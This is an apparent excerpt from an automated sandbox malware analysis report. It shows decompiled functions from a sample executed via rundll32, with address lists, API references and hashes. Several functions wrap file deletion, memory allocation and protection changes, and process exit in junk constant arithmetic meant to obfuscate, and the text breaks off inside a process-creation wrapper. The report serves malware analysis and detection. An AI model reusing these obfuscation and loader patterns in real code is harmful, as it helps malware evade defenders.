				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t42;
				int _t51;
				signed int _t53;
				struct _SHFILEOPSTRUCTW* _t57;

				_push(_a4);
				_t57 = __edx;
				_push(__edx);
				E00412550(_t42);
				_v20 = 0xead4;
				_v20 = _v20 + 0xffff9be4;
				_v20 = _v20 ^ 0x000085bc;
				_v16 = 0x46f7;
				_v16 = _v16 << 0xe;
				_v16 = _v16 << 7;
				_t53 = 0x39;
				_v16 = _v16 / _t53;
				_v16 = _v16 ^ 0x03e8aab4;
				_v12 = 0x2beb;
				_v12 = _v12 ^ 0xafae01c3;
				_v12 = _v12 + 0xffff58eb;
				_v12 = _v12 ^ 0xa5118136;
				_v12 = _v12 ^ 0x0abc415f;
				_v8 = 0xa691;
				_v8 = _v8 ^ 0x7591c523;
				_v8 = _v8 << 0xa;
				_v8 = _v8 + 0x20df;
				_v8 = _v8 ^ 0x458ea297;
				E00407378(_t53, 0x11ef7293, _t53, 0xd20b8aa4, 0x23a);
				_t51 = SHFileOperationW(_t57); // executed
				return _t51;
			}

0x0040e55b
0x0040e55e
0x0040e560
0x0040e562
0x0040e567
0x0040e571
0x0040e57a
0x0040e581
0x0040e588
0x0040e58c
0x0040e595
0x0040e59d
0x0040e5a0
0x0040e5a7
0x0040e5ae
0x0040e5b5
0x0040e5bc
0x0040e5c3
0x0040e5ca
0x0040e5d1
0x0040e5d8
0x0040e5dc
0x0040e5e3
0x0040e602
0x0040e60b
0x0040e611

APIs

SHFileOperationW.SHELL32(?,?,?,?,?,?,?,?,?), ref: 0040E60B

Memory Dump Source

Source File: 00000008.00000002.2334066475.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2334086676.0000000000420000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.2334097394.0000000000422000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: a2bec794df76323023851c9be7ee8809eaedd15e8b0fb47450a564a3f094c509
Instruction ID: 3dd06e24261158741585346e8f940a6ca427a5f61c4d66b0dbfef3b0e1201222
Opcode Fuzzy Hash: a2bec794df76323023851c9be7ee8809eaedd15e8b0fb47450a564a3f094c509
Instruction Fuzzy Hash: 961123B1D01318BBEB18DFA5C84A8DEBBB4FB00718F108598E825B6241D3B95B44DB85

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB1E, Relevance: 1.5, APIs: 1, Instructions: 43
fileCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040EB1E(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t34;
				int _t44;

				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00412550(_t34);
				_v8 = 0xd1b2;
				_v8 = _v8 * 0x63;
				_v8 = _v8 << 4;
				_v8 = _v8 * 0x74;
				_v8 = _v8 ^ 0x4bec8e88;
				_v20 = 0x1fc5;
				_v20 = _v20 + 0x9c84;
				_v20 = _v20 ^ 0x0000b099;
				_v16 = 0x542c;
				_v16 = _v16 | 0x3ba7d0a3;
				_v16 = _v16 ^ 0x3ba7e6ce;
				_v12 = 0x8319;
				_v12 = _v12 * 0x45;
				_v12 = _v12 + 0xffff39a4;
				_v12 = _v12 ^ 0x0022b84c;
				E00407378(__ecx, 0x497c0ce2, __ecx, 0x90f109b3, 0x28d);
				_t44 = DeleteFileW(_a8); // executed
				return _t44;
			}

0x0040eb24
0x0040eb27
0x0040eb2b
0x0040eb2c
0x0040eb31
0x0040eb49
0x0040eb4c
0x0040eb5b
0x0040eb5e
0x0040eb65
0x0040eb6c
0x0040eb73
0x0040eb7a
0x0040eb81
0x0040eb88
0x0040eb8f
0x0040eb9a
0x0040eb9d
0x0040eba4
0x0040ebb7
0x0040ebc2
0x0040ebc7

APIs

DeleteFileW.KERNELBASE(3BA7E6CE), ref: 0040EBC2

Memory Dump Source

Source File: 00000008.00000002.2334066475.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2334086676.0000000000420000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.2334097394.0000000000422000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 5b5a61d3999058f75d5056704f6b95223429b9c5b7b3188806985cdc6256b9e5
Instruction ID: 1a862a12ce259b9b594eaf605fcacc0ae33b71988d820ce1279c505093e24a3a
Opcode Fuzzy Hash: 5b5a61d3999058f75d5056704f6b95223429b9c5b7b3188806985cdc6256b9e5
Instruction Fuzzy Hash: 9B11E3B1C0020DFBDF04DFE4DA4689EBBB4FB40314F608599E814A62A1D7749B549F91

Uniqueness

Uniqueness Score: -1.00%

Function 0040F1ED, Relevance: 1.3, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040F1ED(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t46;
				int _t57;
				signed int _t59;
				signed int _t60;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E00412550(_t46);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x28beb0;
				_v16 = 0xe97b;
				_v16 = _v16 >> 3;
				_t59 = 0x47;
				_v16 = _v16 / _t59;
				_v16 = _v16 ^ 0x00001a39;
				_v12 = 0x2d01;
				_v12 = _v12 >> 8;
				_t60 = 0x3a;
				_v12 = _v12 / _t60;
				_v12 = _v12 ^ 0x000023d3;
				_v20 = 0xc5d9;
				_v20 = _v20 | 0x3e7a6da8;
				_v20 = _v20 ^ 0x3e7ad9f3;
				_v8 = 0x3ddd;
				_v8 = _v8 >> 7;
				_v8 = _v8 + 0xffffadd9;
				_v8 = _v8 ^ 0xffff8e91;
				E00407378(_t60, 0x171b6692, _t60, 0x90f109b3, 0x219);
				_t57 = CloseHandle(_a12); // executed
				return _t57;
			}

0x0040f1f3
0x0040f1f6
0x0040f1f9
0x0040f1fe
0x0040f203
0x0040f20a
0x0040f213
0x0040f21a
0x0040f223
0x0040f228
0x0040f22d
0x0040f234
0x0040f23b
0x0040f242
0x0040f24a
0x0040f24d
0x0040f254
0x0040f25b
0x0040f262
0x0040f269
0x0040f270
0x0040f274
0x0040f27b
0x0040f29a
0x0040f2a5
0x0040f2aa

APIs

CloseHandle.KERNEL32(3E7AD9F3), ref: 0040F2A5

Memory Dump Source

Source File: 00000008.00000002.2334066475.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2334086676.0000000000420000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.2334097394.0000000000422000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: cf10afad277e2012e22543214ce3650eca193848e4e18c4a52ea8fe530b3ff63
Instruction ID: 2095a25752144cfccf41e96eaee5510c5b72647c39549051c61099ea1e271914
Opcode Fuzzy Hash: cf10afad277e2012e22543214ce3650eca193848e4e18c4a52ea8fe530b3ff63
Instruction Fuzzy Hash: 701114B6D0020CEBDF05CFE5C84A9DEBBB5EB14308F108589E914A6290D3B59B649B80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00428330, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetMonitorInfoA.USER32(?,?), ref: 00428361
GetSystemMetrics.USER32(00000000), ref: 0042839D
GetSystemMetrics.USER32(00000001), ref: 004283A8

Strings

GetMonitorInfo, xrefs: 00428348
DISPLAY, xrefs: 004283C9
/}Au, xrefs: 0042839D, 004283A8

Memory Dump Source

Source File: 00000008.00000002.2334101660.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_423000_rundll32.jbxd

Similarity

API ID: MetricsSystem$InfoMonitor
String ID: /}Au$DISPLAY$GetMonitorInfo
API String ID: 4250584380-1428758730
Opcode ID: f469fe6cc5c65eba809066f83245f4e1bd66ea089cc0b94f912417a624723c54
Instruction ID: 637bc979103a918286e5382f01602372abea4ab8c4984eea237f75ea849c2a86
Opcode Fuzzy Hash: f469fe6cc5c65eba809066f83245f4e1bd66ea089cc0b94f912417a624723c54
Instruction Fuzzy Hash: AE11DF717023249FD320CF20AC44BABB7E8EB45B11F41453EED46D7240EBF5A8048BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004285AC, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 004285E5
GetSystemMetrics.USER32(00000000), ref: 0042860A
GetSystemMetrics.USER32(00000001), ref: 00428615

Strings

EnumDisplayMonitors, xrefs: 004285C4
/}Au, xrefs: 0042860A, 00428615

Memory Dump Source

Source File: 00000008.00000002.2334101660.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_423000_rundll32.jbxd

Similarity

API ID: MetricsSystem$DisplayEnumMonitors
String ID: /}Au$EnumDisplayMonitors
API String ID: 1389147845-1105134141
Opcode ID: 1472a42c10fdf64708459078dabd989573ddb0b2d691415af7d2adfc035da151
Instruction ID: 560c2e5531f95041473ab5abdf9a332d975f3a18d6c562c3f42fe07e166bb06b
Opcode Fuzzy Hash: 1472a42c10fdf64708459078dabd989573ddb0b2d691415af7d2adfc035da151
Instruction Fuzzy Hash: 413150B2A02219AFDB00DFA5DC44AEF77BCAF55304F41452BF911E3240EB78D9148BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00428404, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 00428471
GetSystemMetrics.USER32(00000001), ref: 0042847C

Strings

DISPLAY, xrefs: 0042849D
/}Au, xrefs: 00428471, 0042847C
GetMonitorInfoA, xrefs: 0042841C

Memory Dump Source

Source File: 00000008.00000002.2334101660.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_423000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$DISPLAY$GetMonitorInfoA
API String ID: 4116985748-2822609925
Opcode ID: b13fdcab3a368cb303cd6343f0466114add3bfd16c89175a002fa84954f8a16c
Instruction ID: 605c18e4e1bdf3c56052bce9c4db53a3c74fed138b051222b05aff1404ffe72f
Opcode Fuzzy Hash: b13fdcab3a368cb303cd6343f0466114add3bfd16c89175a002fa84954f8a16c
Instruction Fuzzy Hash: 0C11E4717023255FD720EF60AC44BABB7E8EB05320F41453EED459B240EBB4B84487AA

Uniqueness

Uniqueness Score: -1.00%

Function 004284D8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 00428545
GetSystemMetrics.USER32(00000001), ref: 00428550

Strings

DISPLAY, xrefs: 00428571
/}Au, xrefs: 00428545, 00428550
GetMonitorInfoW, xrefs: 004284F0

Memory Dump Source

Source File: 00000008.00000002.2334101660.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_423000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$DISPLAY$GetMonitorInfoW
API String ID: 4116985748-1558784340
Opcode ID: f2edee6e7e9ac4a2c12a34016caccc270bd012c68818faee687fa0a0b208439d
Instruction ID: 99280014b4e7568ae5b78b7f4e1cfa4d9ca9bf2b7dd90ccdf1763cf76fa4773a
Opcode Fuzzy Hash: f2edee6e7e9ac4a2c12a34016caccc270bd012c68818faee687fa0a0b208439d
Instruction Fuzzy Hash: 6C11D671B02314AFD720DF65AC44BABB7E8EB05310F45493FED45D7240EBB5A8848BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00428298, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 004282E6
GetSystemMetrics.USER32(00000001), ref: 004282F8

Strings

MonitorFromPoint, xrefs: 004282AA
/}Au, xrefs: 004282E6, 004282F8

Memory Dump Source

Source File: 00000008.00000002.2334101660.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_423000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$MonitorFromPoint
API String ID: 4116985748-3670600901
Opcode ID: 054316eae768099ac501fd47fccdcfd62b5ce6f092cb257fc86a27f1883456c4
Instruction ID: f632a035e8c56aece19070c7510d802e9804e06d05fa250d5db15c947f9699d3
Opcode Fuzzy Hash: 054316eae768099ac501fd47fccdcfd62b5ce6f092cb257fc86a27f1883456c4
Instruction Fuzzy Hash: 4101A231302328AFDB009F51EC44B9E7B55EB40B54F85403EFD048B251DBB6AC058BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00428170, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 004281C1
GetSystemMetrics.USER32(00000001), ref: 004281CD

Strings

/}Au, xrefs: 004281C1, 004281CD
MonitorFromRect, xrefs: 00428185

Memory Dump Source

Source File: 00000008.00000002.2334101660.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_423000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$MonitorFromRect
API String ID: 4116985748-120404372
Opcode ID: d3b5d27fa188c06af7d19d4766c461fb26eb3d3432a6a9687b20f338ae7786bb
Instruction ID: 7300420cbd37d90105d4b3cf7da4562c34fb93397a177b564f82ba5817a4c9b0
Opcode Fuzzy Hash: d3b5d27fa188c06af7d19d4766c461fb26eb3d3432a6a9687b20f338ae7786bb
Instruction Fuzzy Hash: DB01A2313022249BD7109B14ED85B2BB794E741395F85806FEC04CB283DBB9EC528BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00462B38, Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

DdeCreateStringHandleA.USER32(00000015,00000000), ref: 00462B7C
DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 00462BA9
DdeGetLastError.USER32(00000015), ref: 00462BBB
DdeFreeStringHandle.USER32(00000015,?), ref: 00462BCD

Memory Dump Source

Source File: 00000008.00000002.2334101660.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_423000_rundll32.jbxd

Similarity

API ID: HandleString$ClientCreateErrorFreeLastTransaction
String ID:
API String ID: 2421758087-0
Opcode ID: 9f70acf482eb5e79ca196da2ae36f33cf545ac6692aa57f50a78d7a4637a6d96
Instruction ID: b5047ada5e6505b9d9b610dba3069aac40fc24b3776deae8b4cf26fcfcd54791
Opcode Fuzzy Hash: 9f70acf482eb5e79ca196da2ae36f33cf545ac6692aa57f50a78d7a4637a6d96
Instruction Fuzzy Hash: A3214A742046409FDB40DF59C9C1E5A77E8EB49310F158196F988CF2A6E779EC40CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00461428, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 169COMMON

Download Yara Rule

APIs

DdeQueryConvInfo.USER32(?,?,00000060), ref: 004614BF

Strings

`, xrefs: 00461498
0F, xrefs: 00461607

Memory Dump Source

Source File: 00000008.00000002.2334101660.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_423000_rundll32.jbxd

Similarity

API ID: ConvInfoQuery
String ID: 0F$`
API String ID: 701148680-3237207667
Opcode ID: 5209b332fedc4f6cafecc28ee418f67ac4b0665a7af05f7be5604bd4cc67bf07
Instruction ID: db70940b4a1f0617aeeac80f8a0c91bf787b1828615b15b28606ddd46ecba5aa
Opcode Fuzzy Hash: 5209b332fedc4f6cafecc28ee418f67ac4b0665a7af05f7be5604bd4cc67bf07
Instruction Fuzzy Hash: 13518476B006199BCB00DE5DD9854AF73B9AB48354F1D4026FD06D7360EA38DD02C7AB

Uniqueness

Uniqueness Score: -1.00%

Function 004280E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(?), ref: 00428110

Strings

GetSystemMetrics, xrefs: 004280F8
/}Au, xrefs: 004280FD, 0042810A, 00428110

Memory Dump Source

Source File: 00000008.00000002.2334101660.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_423000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$GetSystemMetrics
API String ID: 4116985748-3773086709
Opcode ID: 4c5f92fa1d7377d91b8f4fbca774eb960f9bdc49951ee80ed77666db2558805d
Instruction ID: 0ee67d0bb69f832fec1fca06a4eed47d1578d3d3e795e0a9096b3779754e9213
Opcode Fuzzy Hash: 4c5f92fa1d7377d91b8f4fbca774eb960f9bdc49951ee80ed77666db2558805d
Instruction Fuzzy Hash: 4AF0F0303072204ADB105F38BE8163E7546A782374FE08A3FE126466D2DE7C8823824E

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 2960 Parent PID: 3044 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	1.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	73
Total number of Limit Nodes:	5

Executed Functions

Function 002E3928, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnhMetaFileA.GDI32(trty55345), ref: 002E39C2
VirtualAlloc.KERNELBASE(00000000,002E6CB4,00001000,00000040), ref: 002E3A8E

Strings

|l., xrefs: 002E3961
trty55345, xrefs: 002E39BD

Memory Dump Source

Source File: 00000009.00000002.2335427349.00000000002A3000.00000020.00020000.sdmp, Offset: 002A3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a3000_rundll32.jbxd

Similarity

API ID: AllocFileMetaVirtual
String ID: trty55345$|l.
API String ID: 2643768156-1491097063
Opcode ID: 8a45af1223121bf419f6ac44b1f4c8b6fe18ec74f2f9a69ebce62f5ab51a0f87
Instruction ID: 8a86661959db493a3828d788f9d4ece386da9e4f1327d9314718b4b70964a21c
Opcode Fuzzy Hash: 8a45af1223121bf419f6ac44b1f4c8b6fe18ec74f2f9a69ebce62f5ab51a0f87
Instruction Fuzzy Hash: DF6180746912C19FD740DF28FDDEB4537A2F728395B60A41AE4898F2B1DB72A854CF04

Uniqueness

Uniqueness Score: -1.00%

Function 002904C7, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E002904C7() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t48;
				signed int _t49;

				_v8 = 0xb3b9;
				_v8 = _v8 + 0x1dd8;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x000002ef;
				_v20 = 0x5082;
				_t48 = 0xc;
				_v20 = _v20 / _t48;
				_v20 = _v20 ^ 0x00006c35;
				_v12 = 0x710;
				_v12 = _v12 >> 3;
				_t49 = 0x6d;
				_v12 = _v12 / _t49;
				_v12 = _v12 ^ 0x0000532a;
				_v16 = 0x5a4c;
				_v16 = _v16 ^ 0xca4a1f4d;
				_v16 = _v16 ^ 0xca4a24cd;
				E00287378(_t49, 0xbe36c403, _t49, 0x90f109b3, 0x2de);
				ExitProcess(0);
			}

0x002904cd
0x002904d6
0x002904dd
0x002904e1
0x002904e5
0x002904ec
0x002904f8
0x002904fd
0x00290502
0x00290509
0x00290510
0x00290517
0x0029051f
0x00290522
0x00290529
0x00290530
0x00290537
0x00290556
0x00290560

APIs

ExitProcess.KERNEL32(00000000), ref: 00290560

Strings

5l, xrefs: 00290502
*S, xrefs: 00290522
LZ, xrefs: 00290529

Memory Dump Source

Source File: 00000009.00000002.2335393724.0000000000280000.00000040.00020000.sdmp, Offset: 00280000, based on PE: true

Associated: 00000009.00000002.2335415842.00000000002A0000.00000040.00020000.sdmp Download File
Associated: 00000009.00000002.2335421471.00000000002A2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_280000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: *S$5l$LZ
API String ID: 621844428-1939029103
Opcode ID: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
Instruction ID: 435b21154b15316cda4360a41ec3216661c821f35427ab13b2d997588ddb8b8f
Opcode Fuzzy Hash: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
Instruction Fuzzy Hash: 3C11F771E0530CEBEB04DFE4D84AA9EBBB1EB50714F10C189E414A7284D7F96B548F41

Uniqueness

Uniqueness Score: -1.00%

Function 002E1638, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DdeInitializeA.USER32(00000044,Function_0003E428,00000000,00000000), ref: 002E1686

Strings

Link, xrefs: 002E1666

Memory Dump Source

Source File: 00000009.00000002.2335427349.00000000002A3000.00000020.00020000.sdmp, Offset: 002A3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a3000_rundll32.jbxd

Similarity

API ID: Initialize
String ID: Link
API String ID: 2538663250-2526951119
Opcode ID: ce2e04455ea1fa2f34eb6df3a0c25df10bc108a1265e07742438f719a923000e
Instruction ID: dcd915e453f1e30ce4b88a40eddaa15eb89feb85af8f858cd2c88b42453acb4e
Opcode Fuzzy Hash: ce2e04455ea1fa2f34eb6df3a0c25df10bc108a1265e07742438f719a923000e
Instruction Fuzzy Hash: E8119E74661780ABC720FB76DD82A4E77E8EF05B10F901875F400DBA91EA32AA318B55

Uniqueness

Uniqueness Score: -1.00%

Function 0035EB40, Relevance: 3.3, APIs: 2, Instructions: 252
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0035EB8F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 0035EDD9

Memory Dump Source

Source File: 00000009.00000002.2335519485.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction ID: 77d1204b38ccb88ce9b74cab494424efb0ac3a3193940b9e223737f5c1489f30
Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction Fuzzy Hash: 0BC1C9B5A00209DFCB48CF98C590EAEB7B6BF88305F148159E809AB355D735EE46CF90

Uniqueness

Uniqueness Score: -1.00%

Function 002E1A14, Relevance: 3.1, APIs: 2, Instructions: 56
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 002E1AC8: DdeFreeStringHandle.USER32(?,?), ref: 002E1AE8

DdeCreateStringHandleA.USER32(?,00000000), ref: 002E1A82
DdeNameService.USER32(?,00000000,00000000,00000001), ref: 002E1A95

Memory Dump Source

Source File: 00000009.00000002.2335427349.00000000002A3000.00000020.00020000.sdmp, Offset: 002A3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a3000_rundll32.jbxd

Similarity

API ID: HandleString$CreateFreeNameService
String ID:
API String ID: 374373348-0
Opcode ID: 6468bca643b21c79c6d5ecb5416600557561cd996832ba97c928a3916d8b074f
Instruction ID: 3bf214f795d5f9d3294253e66c4e8567b56ccf308414c89853ba8cc7abe1623e
Opcode Fuzzy Hash: 6468bca643b21c79c6d5ecb5416600557561cd996832ba97c928a3916d8b074f
Instruction Fuzzy Hash: 361182357722555BCB11FEA5C882A5E37ACEF09B00B810570FC009B386E670ED218B94

Uniqueness

Uniqueness Score: -1.00%

Function 00287F4B, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00287F4B(WCHAR* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t35;
				int _t43;
				WCHAR* _t46;

				_push(_a12);
				_t46 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00292550(_t35);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x71485a;
				_v28 = 0x57c810;
				_v20 = 0x2813;
				_v20 = _v20 * 0x59;
				_v20 = _v20 ^ 0x000dd428;
				_v16 = 0xdb84;
				_v16 = _v16 | 0xe2c96d38;
				_v16 = _v16 ^ 0xe2c994d7;
				_v12 = 0xc19e;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x000060ae;
				_v8 = 0x265e;
				_v8 = _v8 + 0x315a;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x02bd94c0;
				E00287378(__ecx, 0x8a39c19d, __ecx, 0x90f109b3, 0x96);
				_t43 = lstrcmpiW(_t46, _a4); // executed
				return _t43;
			}

0x00287f52
0x00287f55
0x00287f57
0x00287f5a
0x00287f5e
0x00287f5f
0x00287f64
0x00287f6b
0x00287f72
0x00287f79
0x00287f94
0x00287f97
0x00287f9e
0x00287fa5
0x00287fac
0x00287fb3
0x00287fba
0x00287fbe
0x00287fc5
0x00287fcc
0x00287fd3
0x00287fd7
0x00287feb
0x00287ff7
0x00287ffd

APIs

lstrcmpiW.KERNELBASE(?,000060AE,?,?,?,?,?,?,?,?,?,00000000), ref: 00287FF7

Strings

ZHq, xrefs: 00287F6B

Memory Dump Source

Source File: 00000009.00000002.2335393724.0000000000280000.00000040.00020000.sdmp, Offset: 00280000, based on PE: true

Associated: 00000009.00000002.2335415842.00000000002A0000.00000040.00020000.sdmp Download File
Associated: 00000009.00000002.2335421471.00000000002A2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_280000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: ZHq
API String ID: 1586166983-2177431251
Opcode ID: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
Instruction ID: ece9b34b4eb655b8c0645349ecd284dede7a8da1ecb1821a7f815214fbe57fb6
Opcode Fuzzy Hash: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
Instruction Fuzzy Hash: C011D2B6C01219BBDF05DF94C94A8DEBFB4EF04318F108588E92466251D3B95B15DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0035E620, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0035E6A4

Strings

VirtualAlloc, xrefs: 0035E689, 0035E68C

Memory Dump Source

Source File: 00000009.00000002.2335519485.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction ID: ce144d6618ddd4b2dea20e6c5d4997768a10f2a614dbbba8e0576b7cd66e73eb
Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction Fuzzy Hash: A5114264D082C9DEEF01DBE88409BFFBFB55F11705F044098E9446B282D3BA57588BB6

Uniqueness

Uniqueness Score: -1.00%

Function 0029B86E, Relevance: 1.6, APIs: 1, Instructions: 74
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 40%

			E0029B86E(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a24, struct _PROCESS_INFORMATION* _a40, intOrPtr _a44, intOrPtr _a48, WCHAR* _a52, intOrPtr _a56, struct _STARTUPINFOW* _a60, intOrPtr _a68) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t49;
				int _t58;
				signed int _t60;
				int _t65;

				_push(_a68);
				_t65 = __ecx;
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(0);
				_push(_a24);
				_push(0);
				_push(_a16);
